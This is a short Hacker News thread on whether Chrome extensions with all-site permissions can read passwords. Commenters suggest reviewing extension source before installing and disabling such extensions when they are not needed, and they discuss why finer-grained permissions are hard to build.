Hacker News new | past | comments | ask | show | jobs | submit login
Chrome Extension says “it can read my data in all the website I visit”
5 points by rammy1234 9 months ago | hide | past | web | favorite | 3 comments
Will these extensions can read my passwords ? what do you all feel about this. How safe are any chrome extensions

You can read the source and see for yourself. I use an extension called CRX viewer [0] to unpack extensions and view their source before installing them. When you’re in the extensions store you just click the button and it shows you the source.

When inspecting the source I grep for http/network calls and anything that looks suspicious. Most extensions are fairly simple and it’s easy to see when they’re not malicious.

Problem is, those extensions can update their source at any time. Ownership can change. A good extension can turn malicious while you aren’t looking. For that reason, if I really need an extension with “all website” permissions, I make sure to disable it and only enable it when I use it.

The only long running extension with those permissions on my machine is uBlock.

[0] https://chrome.google.com/webstore/detail/chrome-extension-s...

why an extension needs all website permission, even then can't google provide a mechanism to avoid password fields out of scope of access. Is there a reason why it is not done ? technically speaking.

Lazy developers, that’s all there is to it.

And of course some extensions do need access to the whole page, including password fields. For example a password manager obviously needs access (though it shouldn’t need to read the password field, only write to it).

As to why it’s not possible to have super granular permissions (i.e. restricting to certain elements on the page) — that would break the whole extension model, because scripts you inject into the page would have to operate on a “shadow DOM” of sorts. Also properly sand boxing within a single DOM would be porously impossible.

Now that I type it out though, I could see how maybe it would be possible to construct a restricted, parallel DOM for an extension to interact with... but I really don’t think the complexity is worth changing the status quo.

Applications are open for YC Summer 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact